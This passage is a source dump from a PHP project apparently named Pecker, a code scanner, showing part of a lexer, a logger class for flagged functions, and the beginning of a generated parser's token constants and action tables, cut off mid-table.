T_OPEN_TAG), 1); 36 | } 37 | 38 | /** 39 | * Initializes the lexer for lexing the provided source code. 40 | * 41 | * @param string $code The source code to lex 42 | * 43 | * @throws PHPParser_Error on lexing errors (unterminated comment or unexpected character) 44 | */ 45 | public function startLexing($code) 46 | { 47 | if (preg_match('/<\?(php)?\s*@Zend;[\r\n|\n]+\d+;/', $code)) { 48 | $this->errMsg = 'Encrypt with Zend optimizer.'; 49 | return false; 50 | } 51 | $this->resetErrors(); 52 | $this->tokens = token_get_all($code); 53 | $this->code = $code; 54 | $this->pos = -1; 55 | $this->line = 1; 56 | return $this->checkError(); 57 | } 58 | 59 | protected function resetErrors() { 60 | // clear error_get_last() by forcing an undefined variable error 61 | @$undefinedVariable; 62 | } 63 | 64 | protected function checkError() 65 | { 66 | $error = error_get_last(); 67 | 68 | if (preg_match('~^Unterminated comment starting line ([0-9]+)$~',$error['message'], $matches)) 69 | { 70 | $this->errMsg = 'Unterminated comment at line '.$matches[1]; 71 | return false; 72 | } 73 | 74 | if (preg_match('~^Unexpected character in input: \'(.)\' \(ASCII=([0-9]+)\)~s',$error['message'], $matches)) 75 | { 76 | $this->errMsg = sprintf('Unexpected character "%s" (ASCII %d)', $matches[1], $matches[2]); 77 | return false; 78 | } 79 | 80 | // PHP cuts error message after null byte, so need special case 81 | if (preg_match('~^Unexpected character in input: \'$~', $error['message'])) 82 | { 83 | return false; 84 | } 85 | 86 | //@todo 对其他类型语法错误检测 87 | return true; 88 | } 89 | 90 | public function getError() 91 | { 92 | return $this->errMsg; 93 | } 94 | 95 | 96 | /** 97 | * Fetches the next token. 98 | * 99 | * @param mixed $value Variable to store token content in 100 | * @param mixed $startAttributes Variable to store start attributes in 101 | * @param mixed $endAttributes Variable to store end attributes in 102 | * 103 | * @return int Token id 104 | */ 105 | public function getNextToken(&$value = null, &$startAttributes = null, &$endAttributes = null) { 106 | $startAttributes = array(); 107 | $endAttributes = array(); 108 | 109 | while (isset($this->tokens[++$this->pos])) { 110 | $token = $this->tokens[$this->pos]; 111 | 112 | if (is_string($token)) { 113 | $startAttributes['startLine'] = $this->line; 114 | $endAttributes['endLine'] = $this->line; 115 | 116 | // bug in token_get_all 117 | if ('b"' === $token) { 118 | $value = 'b"'; 119 | return ord('"'); 120 | } else { 121 | $value = $token; 122 | return ord($token); 123 | } 124 | } else { 125 | $this->line += substr_count($token[1], "\n"); 126 | 127 | if (T_COMMENT === $token[0]) { 128 | // $startAttributes['comments'][] = new PHPParser_Comment($token[1], $token[2]); 129 | } elseif (T_DOC_COMMENT === $token[0]) { 130 | // $startAttributes['comments'][] = new PHPParser_Comment_Doc($token[1], $token[2]); 131 | } elseif (!isset($this->dropTokens[$token[0]])) { 132 | $value = $token[1]; 133 | $startAttributes['startLine'] = $token[2]; 134 | $endAttributes['endLine'] = $this->line; 135 | 136 | return $this->tokenMap[$token[0]]; 137 | } 138 | } 139 | } 140 | 141 | $startAttributes['startLine'] = $this->line; 142 | 143 | // 0 is the EOF token 144 | return 0; 145 | } 146 | 147 | /** 148 | * Creates the token map. 149 | * 150 | * The token map maps the PHP internal token identifiers 151 | * to the identifiers used by the Parser. Additionally it 152 | * maps T_OPEN_TAG_WITH_ECHO to T_ECHO and T_CLOSE_TAG to ';'. 153 | * 154 | * @return array The token map 155 | */ 156 | protected function createTokenMap() { 157 | $tokenMap = array(); 158 | 159 | // 256 is the minimum possible token number, as everything below 160 | // it is an ASCII value 161 | for ($i = 256; $i < 1000; ++$i) { 162 | // T_DOUBLE_COLON is equivalent to T_PAAMAYIM_NEKUDOTAYIM 163 | if (T_DOUBLE_COLON === $i) { 164 | $tokenMap[$i] = Pecker_Parser::T_PAAMAYIM_NEKUDOTAYIM; 165 | // T_OPEN_TAG_WITH_ECHO with dropped T_OPEN_TAG results in T_ECHO 166 | } elseif(T_OPEN_TAG_WITH_ECHO === $i) { 167 | $tokenMap[$i] = Pecker_Parser::T_ECHO; 168 | // T_CLOSE_TAG is equivalent to ';' 169 | } elseif(T_CLOSE_TAG === $i) { 170 | $tokenMap[$i] = ord(';'); 171 | // and the others can be mapped directly 172 | } elseif ('UNKNOWN' !== ($name = token_name($i)) && defined($name = 'Pecker_Parser::' . $name) ) 173 | { 174 | $tokenMap[$i] = constant($name); 175 | } 176 | } 177 | 178 | return $tokenMap; 179 | } 180 | 181 | public function getTokens() 182 | { 183 | return $this->tokens; 184 | } 185 | } 186 | ?> -------------------------------------------------------------------------------- /Pecker/Loger.php: -------------------------------------------------------------------------------- 1 | 15 | * @package Scanner 16 | * @version $Id: Loger.php 11 2013-09-16 03:27:55Z cfc4n $ 17 | */ 18 | 19 | class Pecker_Loger 20 | { 21 | protected $result; 22 | private $file; 23 | function __construct() 24 | { 25 | $this->result = array(); 26 | } 27 | public function setFile($file) 28 | { 29 | $this->file = $file; 30 | $this->result[$this->file] = array('parser' => true,'message'=>'','function'=>array()); 31 | } 32 | public function errorLog($msg) 33 | { 34 | $this->result[$this->file]['parser'] = false; 35 | $this->result[$this->file]['message'] = $msg; 36 | } 37 | 38 | public function catchLog($func, $line, array $code =array('more'=>'', 'less'=>'')) 39 | { 40 | $this->result[$this->file]['parser'] = true; 41 | $this->result[$this->file]['function'][$func] = isset($this->result[$this->file]['function'][$func]) ? $this->result[$this->file]['function'][$func] : array(); 42 | $this->result[$this->file]['function'][$func][] = array('line'=>$line,'codemore'=>$code['more'], 'codeless'=>$code['less']); 43 | } 44 | 45 | public function getReport() 46 | { 47 | return $this->result; 48 | } 49 | } 50 | ?> -------------------------------------------------------------------------------- /Pecker/Parser.php: -------------------------------------------------------------------------------- 1 | 17 | * @package Parser 18 | * @version $Id: Parser.php 29 2014-03-06 12:55:31Z cfc4n $ 19 | */ 20 | 21 | class Pecker_Parser 22 | { 23 | const TOKEN_NONE = -1; 24 | const TOKEN_INVALID = 151; 25 | 26 | const TOKEN_MAP_SIZE = 386; 27 | 28 | const YYLAST = 1008; 29 | const YY2TBLSTATE = 316; 30 | const YYGLAST = 444; 31 | const YYNLSTATES = 531; 32 | const YYUNEXPECTED = 32767; 33 | const YYDEFAULT = -32766; 34 | 35 | // {{{ Tokens 36 | const YYERRTOK = 256; 37 | const T_INCLUDE = 257; 38 | const T_INCLUDE_ONCE = 258; 39 | const T_EVAL = 259; 40 | const T_REQUIRE = 260; 41 | const T_REQUIRE_ONCE = 261; 42 | const T_LOGICAL_OR = 262; 43 | const T_LOGICAL_XOR = 263; 44 | const T_LOGICAL_AND = 264; 45 | const T_PRINT = 265; 46 | const T_YIELD = 266; 47 | const T_PLUS_EQUAL = 267; 48 | const T_MINUS_EQUAL = 268; 49 | const T_MUL_EQUAL = 269; 50 | const T_DIV_EQUAL = 270; 51 | const T_CONCAT_EQUAL = 271; 52 | const T_MOD_EQUAL = 272; 53 | const T_AND_EQUAL = 273; 54 | const T_OR_EQUAL = 274; 55 | const T_XOR_EQUAL = 275; 56 | const T_SL_EQUAL = 276; 57 | const T_SR_EQUAL = 277; 58 | const T_BOOLEAN_OR = 278; 59 | const T_BOOLEAN_AND = 279; 60 | const T_IS_EQUAL = 280; 61 | const T_IS_NOT_EQUAL = 281; 62 | const T_IS_IDENTICAL = 282; 63 | const T_IS_NOT_IDENTICAL = 283; 64 | const T_IS_SMALLER_OR_EQUAL = 284; 65 | const T_IS_GREATER_OR_EQUAL = 285; 66 | const T_SL = 286; 67 | const T_SR = 287; 68 | const T_INSTANCEOF = 288; 69 | const T_INC = 289; 70 | const T_DEC = 290; 71 | const T_INT_CAST = 291; 72 | const T_DOUBLE_CAST = 292; 73 | const T_STRING_CAST = 293; 74 | const T_ARRAY_CAST = 294; 75 | const T_OBJECT_CAST = 295; 76 | const T_BOOL_CAST = 296; 77 | const T_UNSET_CAST = 297; 78 | const T_NEW = 298; 79 | const T_CLONE = 299; 80 | const T_EXIT = 300; 81 | const T_IF = 301; 82 | const T_ELSEIF = 302; 83 | const T_ELSE = 303; 84 | const T_ENDIF = 304; 85 | const T_LNUMBER = 305; 86 | const T_DNUMBER = 306; 87 | const T_STRING = 307; 88 | const T_STRING_VARNAME = 308; 89 | const T_VARIABLE = 309; 90 | const T_NUM_STRING = 310; 91 | const T_INLINE_HTML = 311; 92 | const T_CHARACTER = 312; 93 | const T_BAD_CHARACTER = 313; 94 | const T_ENCAPSED_AND_WHITESPACE = 314; 95 | const T_CONSTANT_ENCAPSED_STRING = 315; 96 | const T_ECHO = 316; 97 | const T_DO = 317; 98 | const T_WHILE = 318; 99 | const T_ENDWHILE = 319; 100 | const T_FOR = 320; 101 | const T_ENDFOR = 321; 102 | const T_FOREACH = 322; 103 | const T_ENDFOREACH = 323; 104 | const T_DECLARE = 324; 105 | const T_ENDDECLARE = 325; 106 | const T_AS = 326; 107 | const T_SWITCH = 327; 108 | const T_ENDSWITCH = 328; 109 | const T_CASE = 329; 110 | const T_DEFAULT = 330; 111 | const T_BREAK = 331; 112 | const T_CONTINUE = 332; 113 | const T_GOTO = 333; 114 | const T_FUNCTION = 334; 115 | const T_CONST = 335; 116 | const T_RETURN = 336; 117 | const T_TRY = 337; 118 | const T_CATCH = 338; 119 | const T_FINALLY = 339; 120 | const T_THROW = 340; 121 | const T_USE = 341; 122 | const T_INSTEADOF = 342; 123 | const T_GLOBAL = 343; 124 | const T_STATIC = 344; 125 | const T_ABSTRACT = 345; 126 | const T_FINAL = 346; 127 | const T_PRIVATE = 347; 128 | const T_PROTECTED = 348; 129 | const T_PUBLIC = 349; 130 | const T_VAR = 350; 131 | const T_UNSET = 351; 132 | const T_ISSET = 352; 133 | const T_EMPTY = 353; 134 | const T_HALT_COMPILER = 354; 135 | const T_CLASS = 355; 136 | const T_TRAIT = 356; 137 | const T_INTERFACE = 357; 138 | const T_EXTENDS = 358; 139 | const T_IMPLEMENTS = 359; 140 | const T_OBJECT_OPERATOR = 360; 141 | const T_DOUBLE_ARROW = 361; 142 | const T_LIST = 362; 143 | const T_ARRAY = 363; 144 | const T_CALLABLE = 364; 145 | const T_CLASS_C = 365; 146 | const T_TRAIT_C = 366; 147 | const T_METHOD_C = 367; 148 | const T_FUNC_C = 368; 149 | const T_LINE = 369; 150 | const T_FILE = 370; 151 | const T_COMMENT = 371; 152 | const T_DOC_COMMENT = 372; 153 | const T_OPEN_TAG = 373; 154 | const T_OPEN_TAG_WITH_ECHO = 374; 155 | const T_CLOSE_TAG = 375; 156 | const T_WHITESPACE = 376; 157 | const T_START_HEREDOC = 377; 158 | const T_END_HEREDOC = 378; 159 | const T_DOLLAR_OPEN_CURLY_BRACES = 379; 160 | const T_CURLY_OPEN = 380; 161 | const T_PAAMAYIM_NEKUDOTAYIM = 381; 162 | const T_NAMESPACE = 382; 163 | const T_NS_C = 383; 164 | const T_DIR = 384; 165 | const T_NS_SEPARATOR = 385; 166 | // }}} 167 | 168 | /* @var array Map of token ids to their respective names */ 169 | protected static $terminals = array( 170 | "EOF", 171 | "error", 172 | "T_INCLUDE", 173 | "T_INCLUDE_ONCE", 174 | "T_EVAL", 175 | "T_REQUIRE", 176 | "T_REQUIRE_ONCE", 177 | "','", 178 | "T_LOGICAL_OR", 179 | "T_LOGICAL_XOR", 180 | "T_LOGICAL_AND", 181 | "T_PRINT", 182 | "T_YIELD", 183 | "'='", 184 | "T_PLUS_EQUAL", 185 | "T_MINUS_EQUAL", 186 | "T_MUL_EQUAL", 187 | "T_DIV_EQUAL", 188 | "T_CONCAT_EQUAL", 189 | "T_MOD_EQUAL", 190 | "T_AND_EQUAL", 191 | "T_OR_EQUAL", 192 | "T_XOR_EQUAL", 193 | "T_SL_EQUAL", 194 | "T_SR_EQUAL", 195 | "'?'", 196 | "':'", 197 | "T_BOOLEAN_OR", 198 | "T_BOOLEAN_AND", 199 | "'|'", 200 | "'^'", 201 | "'&'", 202 | "T_IS_EQUAL", 203 | "T_IS_NOT_EQUAL", 204 | "T_IS_IDENTICAL", 205 | "T_IS_NOT_IDENTICAL", 206 | "'<'", 207 | "T_IS_SMALLER_OR_EQUAL", 208 | "'>'", 209 | "T_IS_GREATER_OR_EQUAL", 210 | "T_SL", 211 | "T_SR", 212 | "'+'", 213 | "'-'", 214 | "'.'", 215 | "'*'", 216 | "'/'", 217 | "'%'", 218 | "'!'", 219 | "T_INSTANCEOF", 220 | "'~'", 221 | "T_INC", 222 | "T_DEC", 223 | "T_INT_CAST", 224 | "T_DOUBLE_CAST", 225 | "T_STRING_CAST", 226 | "T_ARRAY_CAST", 227 | "T_OBJECT_CAST", 228 | "T_BOOL_CAST", 229 | "T_UNSET_CAST", 230 | "'@'", 231 | "'['", 232 | "T_NEW", 233 | "T_CLONE", 234 | "T_EXIT", 235 | "T_IF", 236 | "T_ELSEIF", 237 | "T_ELSE", 238 | "T_ENDIF", 239 | "T_LNUMBER", 240 | "T_DNUMBER", 241 | "T_STRING", 242 | "T_STRING_VARNAME", 243 | "T_VARIABLE", 244 | "T_NUM_STRING", 245 | "T_INLINE_HTML", 246 | "T_ENCAPSED_AND_WHITESPACE", 247 | "T_CONSTANT_ENCAPSED_STRING", 248 | "T_ECHO", 249 | "T_DO", 250 | "T_WHILE", 251 | "T_ENDWHILE", 252 | "T_FOR", 253 | "T_ENDFOR", 254 | "T_FOREACH", 255 | "T_ENDFOREACH", 256 | "T_DECLARE", 257 | "T_ENDDECLARE", 258 | "T_AS", 259 | "T_SWITCH", 260 | "T_ENDSWITCH", 261 | "T_CASE", 262 | "T_DEFAULT", 263 | "T_BREAK", 264 | "T_CONTINUE", 265 | "T_GOTO", 266 | "T_FUNCTION", 267 | "T_CONST", 268 | "T_RETURN", 269 | "T_TRY", 270 | "T_CATCH", 271 | "T_FINALLY", 272 | "T_THROW", 273 | "T_USE", 274 | "T_INSTEADOF", 275 | "T_GLOBAL", 276 | "T_STATIC", 277 | "T_ABSTRACT", 278 | "T_FINAL", 279 | "T_PRIVATE", 280 | "T_PROTECTED", 281 | "T_PUBLIC", 282 | "T_VAR", 283 | "T_UNSET", 284 | "T_ISSET", 285 | "T_EMPTY", 286 | "T_HALT_COMPILER", 287 | "T_CLASS", 288 | "T_TRAIT", 289 | "T_INTERFACE", 290 | "T_EXTENDS", 291 | "T_IMPLEMENTS", 292 | "T_OBJECT_OPERATOR", 293 | "T_DOUBLE_ARROW", 294 | "T_LIST", 295 | "T_ARRAY", 296 | "T_CALLABLE", 297 | "T_CLASS_C", 298 | "T_TRAIT_C", 299 | "T_METHOD_C", 300 | "T_FUNC_C", 301 | "T_LINE", 302 | "T_FILE", 303 | "T_START_HEREDOC", 304 | "T_END_HEREDOC", 305 | "T_DOLLAR_OPEN_CURLY_BRACES", 306 | "T_CURLY_OPEN", 307 | "T_PAAMAYIM_NEKUDOTAYIM", 308 | "T_NAMESPACE", 309 | "T_NS_C", 310 | "T_DIR", 311 | "T_NS_SEPARATOR", 312 | "';'", 313 | "'{'", 314 | "'}'", 315 | "'('", 316 | "')'", 317 | "'$'", 318 | "'`'", 319 | "']'", 320 | "'\"'" 321 | , "???" 322 | ); 323 | 324 | /* @var array Map which translates lexer tokens to internal tokens */ 325 | protected static $translate = array( 326 | 0, 151, 151, 151, 151, 151, 151, 151, 151, 151, 327 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 328 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 329 | 151, 151, 151, 48, 150, 151, 147, 47, 31, 151, 330 | 145, 146, 45, 42, 7, 43, 44, 46, 151, 151, 331 | 151, 151, 151, 151, 151, 151, 151, 151, 26, 142, 332 | 36, 13, 38, 25, 60, 151, 151, 151, 151, 151, 333 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 334 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 335 | 151, 61, 151, 149, 30, 151, 148, 151, 151, 151, 336 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 337 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 338 | 151, 151, 151, 143, 29, 144, 50, 151, 151, 151, 339 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 340 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 341 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 342 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 343 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 344 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 345 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 346 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 347 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 348 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 349 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 350 | 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 351 | 151, 151, 151, 151, 151, 151, 1, 2, 3, 4, 352 | 5, 6, 8, 9, 10, 11, 12, 14, 15, 16, 353 | 17, 18, 19, 20, 21, 22, 23, 24, 27, 28, 354 | 32, 33, 34, 35, 37, 39, 40, 41, 49, 51, 355 | 52, 53, 54, 55, 56, 57, 58, 59, 62, 63, 356 | 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 357 | 74, 75, 151, 151, 76, 77, 78, 79, 80, 81, 358 | 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 359 | 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 360 | 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 361 | 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 362 | 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 363 | 132, 151, 151, 151, 151, 151, 151, 133, 134, 135, 364 | 136, 137, 138, 139, 140, 141 365 | ); 366 | 367 | protected static $yyaction = array( 368 | 59, 60, 325, 61, 62,-32766,-32766,-32766, 324, 63, 369 | 64,-32767,-32767,-32767,-32767, 98, 99, 100, 101, 102, 370 | 57, 917,-32766, 298,-32766,-32766, 41, 106, 107, 108, 371 | 109, 110, 111, 112, 113, 114, 115, 116, 267, 346, 372 | 65, 66, 927, 249, 929, 928, 67, 535, 68, 220, 373 | 221, 69, 70, 71, 72, 73, 74, 75, 76, 31, 374 | 232, 77, 318, 326, 730, 732, 462, 836, 837, 362, 375 | 348, 895, 238, 578, 280, 363, 46, 27, 327, 859, 376 | 364, 246, 365, 454, 366, 39, 223, 328,-32766,-32766, 377 | -32766, 36, 37, 367, 333, 360, 38, 368, 329, 423, 378 | 78, 848, 122, 278, 279,-32766, 286,-32766, 35, 369, 379 | 370, 371, 372, 373, 389, 343, 861, 330, 560, 602, 380 | 374, 375, 376, 377, 848, 842, 843, 844, 845, 839, 381 | 840, 239, 82, 83, 84, -350, 389, 846, 841, 330, 382 | 584, 504, 126, 47, 227, 259, 244, 802, 248, 40, 383 | 351, 85, 86, 87, 88, 89, 90, 91, 92, 93, 384 | 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 385 | 104, 105, 788, 233, 576,-32766,-32766,-32766, 701, 702, 386 | 703, 700, 699, 698, 630, 0,-32766,-32766,-32766, 655, 387 | 656, 216,-32766, 215,-32766,-32766,-32766,-32766,-32766,-32767, 388 | -32767,-32767,-32767,-32766, 788, 322, 329, 319, 899, 544, 389 | -117, 257, 128, 277,-32766,-32766,-32766, 369, 370, 889, 390 | 693, 261, 895, 225, 226,-32766, 540, 602, 374, 375, 391 | 675, 535, 344,-32766, 535,-32766, 895, 376,-32766,-32766, 392 | -32766, 575,-32766, 53,-32766, 322,-32766, 658, 263,-32766, 393 | 187, 257, 600,-32766,-32766,-32766, 788,-32766,-32766,-32766, 394 | 693, 34,-32766, 535, 350,-32766, 388,-32766, 860, 812, 395 | -32766,-32766,-32766,-32766,-32766, 222,-32766, 54,-32766, 56, 396 | 127,-32766, 100, 101, 102,-32766,-32766,-32766, 788, 22, 397 | -32766,-32766, 601, 268,-32766, 924, 259,-32766, 388, 666, 398 | 631, 389,-32766,-32766, 330,-32766, 322, 224, 334,-32766, 399 | 259, 917, 257, 503, 861, 535, 103, 104, 105,-32766, 400 | 233, 693,-32766,-32766,-32766, 118,-32766, 494,-32766, 340, 401 | -32766, 506, 902,-32766,-32766,-32766, 126,-32766,-32766,-32766, 402 | 345,-32766,-32766,-32766, 213, 123,-32766, 535, 130,-32766, 403 | 388,-32766, 452, 599,-32766,-32766,-32766,-32766,-32766, 119, 404 | -32766, 120,-32766, 788, 233,-32766, 189, -113, 190,-32766, 405 | -32766,-32766, 194, 217,-32766,-32766, 195, 125,-32766,-32766, 406 | -32766,-32766, 388, 188, 685, 858,-32766,-32766, 117,-32766, 407 | 329, 319, 353, 28, 509, 788, 597, 277, 357, 468, 408 | 680, 369, 370, 516,-32766,-32766,-32766, 131, 287, 49, 409 | 540, 602, 374, 375, 477, 478,-32766, 520,-32766,-32766, 410 | 528,-32766, 535,-32766,-32766,-32766,-32766, 655, 656,-32766, 411 | -32766,-32766, 263,-32766, 519,-32766, 507,-32766, 542, 129, 412 | -32766, 679, 525, 588,-32766,-32766,-32766, 526,-32766,-32766, 413 | -32766, 690, 530,-32766, 535, 306,-32766, 388,-32766, 541, 414 | 511,-32766,-32766,-32766,-32766,-32766, 224,-32766, 50,-32766, 415 | 58, 482,-32766, 55, 805, 51,-32766,-32766,-32766, 788, 416 | 52,-32766,-32766, 416, 232,-32766, 502, 687,-32766, 388, 417 | 445, 491, 229,-32766,-32766, 551,-32766, 922, 549, 415, 418 | -32766, 339, 341, 535, 536, 399, 535, 400, 402, 414, 419 | -32766, -158, 401,-32766,-32766,-32766, 493,-32766, 479,-32766, 420 | 475,-32766, -161, 604,-32766,-32766,-32766, 265,-32766,-32766, 421 | -32766, 788,-32766,-32766,-32766, 266, 917,-32766, 535, 256, 422 | -32766, 388,-32766, 342, 212,-32766,-32766,-32766,-32766,-32766, 423 | 338,-32766, 471,-32766, 457, 473,-32766, 359, 603, 258, 424 | -32766,-32766,-32766, 788, 255,-32766,-32766, 577, 260,-32766, 425 | 376, 579,-32766, 388, 847, 247, 0,-32766,-32766, -350, 426 | -32766, 657, 0, 337,-32766, 0, 0, -351, 245, 0, 427 | 535, 121, 193, 42,-32766, -282, 791,-32766,-32766,-32766, 428 | 0,-32766, 0,-32766, 0,-32766, 0, 0,-32766, 570, 429 | -32766, -290,-32766,-32766,-32766, 788,-32766,-32766,-32766, -291, 430 | 499,-32766, 535, 300,-32766, 388,-32766, 288, 251,-32766, 431 | -32766,-32766,-32766,-32766, 242,-32766, 407,-32766, 684, 340, 432 | -32766, 686, 614, 616,-32766,-32766,-32766, 618, 563,-32766, 433 | -32766, 625, 624,-32766, 633, 580,-32766, 388, 565, 587, 434 | 574, 572,-32766, 513,-32766, 512, 45, 44,-32766, 569, 435 | 571, 573, 586, 545, 535, 683, 676, 234,-32766, 510, 436 | 515,-32766,-32766,-32766, 517,-32766, 522,-32766, 81,-32766, 437 | 124, 523,-32766,-32766,-32766, 524,-32766,-32766,-32766, 527, 438 | -32766,-32766,-32766, 505, 529,-32766, 535, 890,-32766, 388, 439 | -32766, 900, 668,-32766,-32766,-32766,-32766,-32766, 827,-32766, 440 | 892,-32766, 880, 894,-32766, 191, 192, 896,-32766,-32766, 441 | -32766, 923, 356,-32766,-32766, 623, 926,-32766, 622, 925, 442 | -32766, 388, 32, 33, 185, 568,-32766, 321,-32766, 317, 443 | 43, 262, 836, 837, 237,-32766,-32766, 236, 48,-32766, 444 | 838, 535, 235, 30, 219,-32766, 218, 214,-32766,-32766, 445 | -32766, 186,-32766, 80,-32766, 79,-32766,-32766,-32766,-32766, 446 | 768, 829, 767,-32766,-32766,-32766, 446, -114,-32766,-32766, 447 | 854, 659,-32766, 795, 792,-32766, 388, 498, 472, 437, 448 | 358, 354, 307,-32766, 289, 25, 24, 23, 442, -113, 449 | 842, 843, 844, 845, 839, 840, 309, 786, 0, 480, 450 | 874, 855, 846, 841, 329, 319, 921, 826,-32766, 329, 451 | -32766, 277,-32766,-32766, 891, 369, 370,-32766,-32766,-32766, 452 | 369, 370, 875, 879, 540, 602, 374, 375, 893, 560, 453 | 602, 374, 375, 329,-32766, 811,-32766,-32766,-32766,-32766, 454 | -32766, 799, 797, 798, 369, 370, 263, 329, 796, 0, 455 | 0, 329, 543, 560, 602, 374, 375, 598, 369, 370, 456 | 0, 0, 369, 370, 329, 0, 0, 560, 602, 374, 457 | 375, 560, 602, 374, 375, 369, 370, 0, 0, 0, 458 | 329, 691, 0, 0, 560, 602, 374, 375, 0, 0, 459 | 0, 369, 370, 329, 0, 790, 0, 329, 501, 591, 460 | 560, 602, 374, 375, 369, 370, 0, 0, 369, 370, 461 | 0, 329, 593, 560, 602, 374, 375, 560, 602, 374, 462 | 375, 0, 369, 370, 492, 0, 0, 0, 514, 0, 463 | 486, 560, 602, 374, 375, 329, 0, 0, 0, 329, 464 | 0, 561, 0, 0, 0, 789, 369, 370, 0, 0, 465 | 369, 370,-32766,-32766,-32766, 560, 602, 374, 375, 560, 466 | 602, 374, 375, 0, 329, 0, 0, 0, 0,-32766, 467 | 0,-32766,-32766,-32766,-32766, 369, 370, 0, 0, 0, 468 | 0, 0, 0, 0, 560, 602, 374, 375 469 | ); 470 | 471 | protected static $yycheck = array( 472 | 2, 3, 4, 5, 6, 8, 9, 10, 7, 11, 473 | 12, 36, 37, 38, 39, 40, 41, 42, 43, 44, 474 | 61, 76, 25, 73, 27, 28, 13, 14, 15, 16, 475 | 17, 18, 19, 20, 21, 22, 23, 24, 61, 7, 476 | 42, 43, 71, 76, 73, 74, 48, 71, 50, 51, 477 | 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 478 | 62, 63, 64, 65, 51, 52, 76, 69, 70, 71, 479 | 71, 73, 7, 75, 7, 77, 78, 79, 80, 134, 480 | 82, 122, 84, 81, 86, 135, 136, 89, 8, 9, 481 | 10, 93, 94, 95, 96, 7, 98, 99, 96, 122, 482 | 102, 134, 143, 105, 106, 25, 7, 27, 7, 107, 483 | 108, 113, 114, 115, 138, 26, 117, 141, 116, 117, 484 | 118, 119, 124, 125, 134, 127, 128, 129, 130, 131, 485 | 132, 133, 8, 9, 10, 122, 138, 139, 140, 141, 486 | 142, 143, 143, 145, 31, 147, 148, 146, 150, 25, 487 | 7, 27, 28, 29, 30, 31, 32, 33, 34, 35, 488 | 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 489 | 46, 47, 12, 49, 142, 8, 9, 10, 106, 107, 490 | 108, 109, 110, 111, 26, 0, 8, 9, 10, 125, 491 | 126, 31, 25, 7, 27, 28, 29, 30, 31, 32, 492 | 33, 34, 35, 25, 12, 97, 96, 97, 71, 142, 493 | 146, 103, 61, 103, 8, 9, 10, 107, 108, 73, 494 | 112, 7, 73, 31, 7, 65, 116, 117, 118, 119, 495 | 142, 71, 143, 8, 71, 75, 73, 124, 78, 79, 496 | 80, 142, 82, 61, 84, 97, 86, 146, 138, 89, 497 | 7, 103, 144, 93, 94, 95, 12, 65, 98, 99, 498 | 112, 7, 102, 71, 71, 105, 106, 75, 71, 106, 499 | 78, 79, 80, 113, 82, 31, 84, 61, 86, 61, 500 | 143, 89, 42, 43, 44, 93, 94, 95, 12, 146, 501 | 98, 99, 144, 147, 102, 144, 147, 105, 106, 73, 502 | 142, 138, 142, 143, 141, 113, 97, 31, 145, 65, 503 | 147, 76, 103, 71, 117, 71, 45, 46, 47, 75, 504 | 49, 112, 78, 79, 80, 143, 82, 71, 84, 141, 505 | 86, 143, 146, 89, 142, 143, 143, 93, 94, 95, 506 | 7, 65, 98, 99, 123, 7, 102, 71, 143, 105, 507 | 106, 75, 147, 144, 78, 79, 80, 113, 82, 143, 508 | 84, 143, 86, 12, 49, 89, 13, 146, 13, 93, 509 | 94, 95, 13, 147, 98, 99, 13, 26, 102, 8, 510 | 9, 105, 106, 13, 142, 150, 142, 143, 13, 113, 511 | 96, 97, 66, 67, 26, 12, 31, 103, 66, 67, 512 | 144, 107, 108, 26, 8, 9, 10, 91, 92, 61, 513 | 116, 117, 118, 119, 100, 101, 65, 26, 142, 143, 514 | 26, 25, 71, 27, 28, 29, 75, 125, 126, 78, 515 | 79, 80, 138, 82, 26, 84, 26, 86, 144, 26, 516 | 89, 142, 143, 26, 93, 94, 95, 26, 65, 98, 517 | 99, 142, 143, 102, 71, 72, 105, 106, 75, 142, 518 | 143, 78, 79, 80, 113, 82, 31, 84, 61, 86, 519 | 61, 68, 89, 61, 73, 61, 93, 94, 95, 12, 520 | 61, 98, 99, 88, 62, 102, 71, 71, 105, 106, 521 | 88, 71, 88, 142, 143, 71, 113, 71, 71, 71, 522 | 65, 71, 71, 71, 71, 71, 71, 71, 71, 71, 523 | 75, 88, 73, 78, 79, 80, 73, 82, 73, 84, 524 | 73, 86, 73, 117, 89, 142, 143, 76, 93, 94, 525 | 95, 12, 65, 98, 99, 76, 76, 102, 71, 121, 526 | 105, 106, 75, 80, 88, 78, 79, 80, 113, 82, 527 | 96, 84, 90, 86, 90, 103, 89, 96, 117, 104, 528 | 93, 94, 95, 12, 120, 98, 99, 142, 120, 102, 529 | 124, 142, 105, 106, 134, 122, -1, 142, 143, 122, 530 | 113, 146, -1, 141, 65, -1, -1, 122, 122, -1, 531 | 71, 123, 123, 123, 75, 137, 146, 78, 79, 80, 532 | -1, 82, -1, 84, -1, 86, -1, -1, 89, 142, 533 | 143, 137, 93, 94, 95, 12, 65, 98, 99, 137, 534 | 137, 102, 71, 137, 105, 106, 75, 137, 137, 78, 535 | 79, 80, 113, 82, 137, 84, 141, 86, 142, 141, 536 | 89, 142, 142, 142, 93, 94, 95, 142, 142, 98, 537 | 99, 142, 142, 102, 142, 142, 105, 106, 142, 142, 538 | 142, 142, 143, 142, 113, 142, 142, 142, 65, 142, 539 | 142, 142, 